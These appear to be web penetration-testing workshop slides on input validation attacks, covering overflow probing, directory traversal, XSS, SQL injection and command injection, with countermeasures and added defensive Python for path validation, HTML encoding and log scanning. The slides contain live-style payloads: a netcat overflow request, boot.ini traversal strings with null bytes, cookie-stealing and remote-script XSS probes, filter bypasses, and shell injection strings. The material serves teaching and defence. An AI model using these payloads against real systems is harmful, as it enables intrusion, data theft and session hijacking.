2. INPUT VALIDATION ATTACKS
Submit data which the application does not expect to receive
Sanity check?
Tries to ensure that the data is useful
Validation routines?
Length check
Content check
Checksum
How to figure out all of the validation checks in an application?
How to exercise all of the validation checks in an application?
Web application penetration testing workshop - Mohsen Ahmadi, 2014-2015
3. CLIENT-SIDE VS. SERVER-SIDE
Why JavaScript?
Simple to implement
Widely supported across Web browsers
Moves a lot of processing from the Web server to the end-user's system
Defeats?
What if JavaScript is disabled?
Using a local proxy
5. EFFECTS
Generating Informational Errors
SQL errors reveal table and column names
Directory path disclosure
Obtaining Arbitrary Data Access
Enumerating, creating and deleting users anonymously
Obtaining Arbitrary Command Execution
SQL injection attacks
System commands like listing directories, copying files
Cross-Site or Embedded Scripting
Targets users rather than the web server or application
6. FIND POTENTIAL TARGETS
Every GET and POST request is fodder for input validation attacks
What is the attack vector?
Altering arguments from the FORM request or from the application itself
Input fields most prone to attack?
Login Name, Password, Address, Phone Number, Credit Card Number, and Search
Every variable in the GET or POST request can be attacked
7. BYPASSING CLIENT-SIDE VALIDATION
Why use JavaScript?
Put dynamic content into pages
Input validation
Bypass JavaScript using:
Local proxy like Achilles, Paros, Burp Suite
Firewall
Pop-up blocker add-ons
Cookie manager
9. BUFFER OVERFLOW
Create the payload for the attack:
perl -e 'print "a" x 50'
Use Perl and netcat
Wrap the Perl line in back ticks and replace the argument (the \r\n\r\n terminates the HTTP request):
echo -e "GET /login.php?user=`perl -e 'print "a" x 500'` HTTP/1.0\r\n\r\n" | nc -vv www.victim.com 80
For HTTPS
curl "https://www.victim.com/login.php?user=`perl -e 'print "a" x 500'`"
10. NTOMAX
Script format
host:192.168.0.1,22,100,500,4000,250,0,2,true,true,true,false
lc:GET /login.php?user=* HTTP/1.0
Host line: IP, port, min, max, timeout, delay, pause, retnum, reopen, norecv, verbose, trial
Loop command (lc): each asterisk is replaced with a string of 'N' characters whose length runs over the min/max range of the host line
ntomax /s < script.txt > results.txt
11. DEEP ANALYSIS OF FEATURES
Additional host parameters:
timeout - ms to wait for socket response - default = 0
delay - ms to wait before sending commands - default = 250
pause - ms to wait before receiving - default = 0
retnum - number of LF/CRs to end buffer - default is one
reopen - T/F reopen connection before each command
norecv - T/F no receive after initial connect - default is off
verbose - T/F verbose output - off by default
trial - T/F display buffer without sending
12. CANONICALIZATION (DOT-DOT-SLASH)
Attack vector:
Access system files outside of the Web document root
When does the attack happen?
When the application parses a file from the server
When it uses template files
How to escape the document root directory?
../../../../../../../../../boot.ini
Salvation?
Limit the types of files that the application is supposed to view
13. PUTTING THE DOT TO WORK
Suppose an application is parsing file contents
What happens if we rename the file to something that we know does not exist?
The error reveals the full installation path of the application, which is then used in directory traversal attacks
Null byte character
/servlet/webacc?user.html=gor-gor
File does not exist: c:\Novell\java\servlets\com\novell\webaccess\templates/gor-gor/login.htt
/servlet/webacc?user.html=../../../../../../../boot.ini%00
%00 ~ URL-encoded null byte character, which truncates the file name so the appended template extension is dropped
14. NAVIGATING WITHOUT DIRECTORY LISTINGS
Explore the terrain without a map!
The first step is to find out where the actual directory root begins
Enumerating files on IIS
By default, the topmost directory is inetpub
Adding directory traversal to /inetpub/wwwroot/default.asp
../../../../../../../../../../??
Find other directories on the server by failure and success
15. STEPS TO ENUMERATING
Examine error codes: 404 / 403
Find the root: drive letter, root
Move down the Web document root
Find common directories: /tmp, /temp, /backups, /downloads
Try to access directory names: use listed directory contents
To improve success in directory traversal attacks you should know about the server's configuration and directory layout
16. COUNTERMEASURES & MITIGATIONS
Remove all dots from user input and parameters
Catch other representations of dots (0x2e) in the parser engine
Remove path information using a regular expression
Secure file system permissions, ACLs
Limit server access to files and folders behind the web root directory
Place configuration files behind the document root directory
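As an added example (not from the workshop), a Python resolver that applies the countermeasures above to a user-supplied template name of the kind the Novell user.html example takes: it decodes alternate encodings of the dot, rejects null bytes and path information rather than stripping them, allows only a positive file-name pattern and extension set, and finally confirms the canonical path is still under the document root. The document root and the allowed extensions are assumptions.

```python
import os
import re
from urllib.parse import unquote

# Constructed values for the example: a document root and the template types
# the viewer is supposed to serve ("limit the types of files").
DOC_ROOT = "/var/www/html"
ALLOWED_EXT = {".htt", ".html"}
# Positive pattern: a bare file name with one extension, no separators.
NAME_RE = re.compile(r"[A-Za-z0-9_-]+\.[A-Za-z0-9]+")


class InvalidPath(ValueError):
    """Raised when the user-supplied name fails a validation check."""


def resolve_template(user_value: str, doc_root: str = DOC_ROOT) -> str:
    """Map a user-supplied template name onto a path under doc_root or raise."""
    # Decode repeatedly so alternate encodings of 0x2e (%2e, %252e) are seen.
    decoded = user_value
    for _ in range(3):
        again = unquote(decoded)
        if again == decoded:
            break
        decoded = again
    # %00 becomes a NUL after decoding; it must never reach the file system.
    if "\x00" in decoded:
        raise InvalidPath("null byte in file name")
    # Reject rather than strip path information: ../, ..\ and bare dots.
    if "/" in decoded or "\\" in decoded or decoded.strip(".") == "":
        raise InvalidPath("path separators or dot segments not allowed")
    if not NAME_RE.fullmatch(decoded):
        raise InvalidPath("file name outside the positive pattern")
    if os.path.splitext(decoded)[1].lower() not in ALLOWED_EXT:
        raise InvalidPath("file type is not served")
    # Final check: the canonical path must still sit below the document root.
    root = os.path.realpath(doc_root)
    full = os.path.realpath(os.path.join(root, decoded))
    if os.path.commonpath([root, full]) != root:
        raise InvalidPath("resolved path escapes the document root")
    return full


def is_safe_template(user_value: str) -> bool:
    """Convenience wrapper: True when resolve_template accepts the name."""
    try:
        resolve_template(user_value)
    except InvalidPath:
        return False
    return True
```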
17. SCRIPT ATTACKS
Include HTML-formatted strings in input to an application that subsequently renders those tags
1. The user enters <script> tags into a form field
2. The user-submitted contents of that field are redisplayed
3. The browser interprets the tag as a JavaScript directive rather than a literal value
Two prerequisites:
The application must accept user input
The application must redisplay the user input
18. COUNTERMEASURE
Handle angle brackets by replacing them with their HTML-encoded values
The user searches for <i>test</i> in the search bar
In the vulnerable scenario the page echoes:
<b><i>test</i></b>
In the secure scenario the page echoes:
<b>&lt;i&gt;test&lt;/i&gt;</b>
19. XSS (CROSS SITE SCRIPTING)
Place malicious code, usually JavaScript, in locations where other users see it
Common scenarios:
Stealing cookies: allows the attacker to impersonate the victim
Social engineering attack: trick the victim into divulging his or her password
Test for XSS:
<script>document.write(document.cookie)</script>
<script>alert('Salut!')</script>
<script src="http://www.malicious-host.foo/badscript.js"></script>
21. COUNTERMEASURE
Turn all angle brackets into their HTML-encoded equivalents
< ~ &lt;
> ~ &gt;
<script> ~ &lt;script&gt;
Limit input fields to the minimum possible
Prefer an inclusive regular expression to an exclusive one; filters that only delete a known bad string are bypassed with:
<scr<script>ipt>: a filter that replaces <script> with nothing once leaves <script> behind
<scr%69pt>: URL-encoded character inside the tag name
<ScRiPt>: case variation
<a href="javascript:code"></a>: no script tag at all
Checking for the presence of a positive (allowed characters) is better than checking for the absence of negatives (known bad strings)
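Added example (not part of the workshop material) comparing the three approaches on this slide and slide 18: a denylist filter that deletes the literal tag once, the HTML-encoding countermeasure, and an inclusive (positive) regular expression for a search term. The probe strings and the search-term character set are constructed for the example.

```python
import html
import re
from urllib.parse import unquote

# Constructed probe strings modelled on the slide's bypass list; they drive a
# comparison of the three defences and are not taken from any real site.
PROBES = [
    "<i>test</i>",
    "<script>alert('Salut!')</script>",
    "<scr<script>ipt>alert(1)</script>",   # nested tag survives one deletion
    "<scr%69pt>alert(1)</script>",         # URL-encoded 'i'
    "<ScRiPt>alert(1)</ScRiPt>",           # case variation
    '<a href="javascript:alert(1)">x</a>',
]


def denylist_filter(value: str) -> str:
    """Exclusive (negative) check: delete the literal tag once. The weak defence."""
    return value.replace("<script>", "").replace("</script>", "")


def encode_for_html(value: str) -> str:
    """Slide countermeasure: angle brackets and quotes become entities, so the
    browser shows the characters instead of interpreting them."""
    return html.escape(value, quote=True)


def accept_search_term(value: str) -> bool:
    """Inclusive (positive) check: only the characters a search term needs."""
    return re.fullmatch(r"[A-Za-z0-9 _.,'-]{1,64}", value) is not None


def still_has_tag(rendered: str) -> bool:
    """Oracle: after the URL-decoding a browser or app may apply, is there still
    a tag start ('<' followed by a letter) for the HTML parser to act on?"""
    return re.search(r"<\s*[a-z]", unquote(rendered), re.IGNORECASE) is not None


def evaluate(probe: str) -> dict:
    """Compare the defences on one probe."""
    return {
        "denylist_bypassed": still_has_tag(denylist_filter(probe)),
        "encoded_safe": not still_has_tag(encode_for_html(probe)),
        "allowlist_accepts": accept_search_term(probe),
    }
```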
22. BOUNDARY CHECKING
Generate informational errors by swapping out the boundaries
The errors they generate can reveal useful information about the application or the server, but you can't get command execution this way
Checklist for vulnerability:
Boolean
String
Numeric
23. MANIPULATING THE APPLICATION
Special directives
Debug=1: reveals more informational errors about the back-end DBMS
%3f.jsp: directory listing in Apache Tomcat 3.2.x, JRun
?openDocument ~ ?editDocument: Lotus Domino servers
htsearch CGI: the -c command-line argument reads an arbitrary configuration file
24. SQL INJECTION AND DATA STORE ATTACKS
OR+1=1 (URL-encoded OR 1=1)
Single quote, tick mark, apostrophe
Errors you might see during an injection test:
You have an error in your SQL syntax
Many SQL injection tests will also reveal errors in files that do not access databases
25. COMMAND EXECUTION
Run arbitrary commands on the server
Ways of altering execution flow on the shell
%0a ~ new line character: analyze.sh?%0a/bin/ls%0a
Check whether arbitrary arguments can be passed to the server: analyze.sh?-h
%7c ~ pipe: chains UNIX commands on the shell
%3b ~ semicolon: separates commands on a single command line
%26 ~ ampersand: delimiter for arguments on the URL
Know your environment in command execution attacks
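Added example (not from the workshop): detection logic on the defender's side that walks constructed access-log lines, URL-decodes each query parameter the way the server would, and flags the shell metacharacters this slide lists, plus the bare option-style argument (?-h). The log layout, the /cgi-bin/ path filter and the sample requests are assumptions made for the example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines (not from the workshop) in a minimal
# 'client "request" status' layout.
SAMPLE_LOG = """\
10.0.0.5 "GET /cgi-bin/analyze.sh?file=report.txt HTTP/1.0" 200
10.0.0.9 "GET /cgi-bin/analyze.sh?file=%0a/bin/ls%0a HTTP/1.0" 200
10.0.0.9 "GET /cgi-bin/analyze.sh?file=report.txt%7cid HTTP/1.0" 200
10.0.0.9 "GET /cgi-bin/analyze.sh?file=x%3bcat+/etc/passwd HTTP/1.0" 500
10.0.0.9 "GET /cgi-bin/analyze.sh?-h HTTP/1.0" 200
10.0.0.7 "GET /search?q=fish+%26+chips HTTP/1.0" 200
"""

# The shell metacharacters the slide lists, as they look once URL-decoded.
# '&' only survives inside a value when it was sent as %26, because parse_qsl
# splits the raw query on literal '&' before decoding.
METACHARS = {"\n": "newline (%0a)", "|": "pipe (%7c)",
             ";": "semicolon (%3b)", "&": "ampersand (%26)"}
# "Know your environment": only paths that hand parameters to a script matter.
SCRIPT_PATH = re.compile(r"/cgi-bin/|\.(sh|cgi|pl)$")
LINE_RE = re.compile(r'^(\S+) "(\S+) (?P<target>\S+) [^"]*" (\d+)')


def analyze_request(target: str) -> list:
    """Findings for one request target (path plus query string)."""
    findings = []
    query = urlsplit(target).query
    # parse_qsl URL-decodes the values; keep_blank_values keeps "?-h" visible.
    for name, value in parse_qsl(query, keep_blank_values=True):
        for char, label in METACHARS.items():
            if char in value:
                findings.append(f"{label} in parameter {name!r}")
        # A bare option-style argument such as "-h" handed to the script.
        if name.startswith("-") and value == "":
            findings.append(f"option-like argument {name!r} passed to script")
    return findings


def scan_log(text: str) -> dict:
    """Map each suspicious log line to its findings; clean lines are omitted."""
    report = {}
    for line in text.splitlines():
        match = LINE_RE.match(line)
        if not match or not SCRIPT_PATH.search(urlsplit(match["target"]).path):
            continue
        findings = analyze_request(match["target"])
        if findings:
            report[line] = findings
    return report
```

The /search line is skipped by the path filter even though its decoded value contains '&': on a plain search field that character is ordinary data, which is the point of knowing the environment before judging a request.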
27. TOP VECTORS FOR INPUT VALIDATION
Each argument of a GET request
Each argument of a POST request
Forms (e-mail address, home address, name, comments)
Search fields
Cookie values
Browser environment values (User-Agent, IP address, operating system, etc.)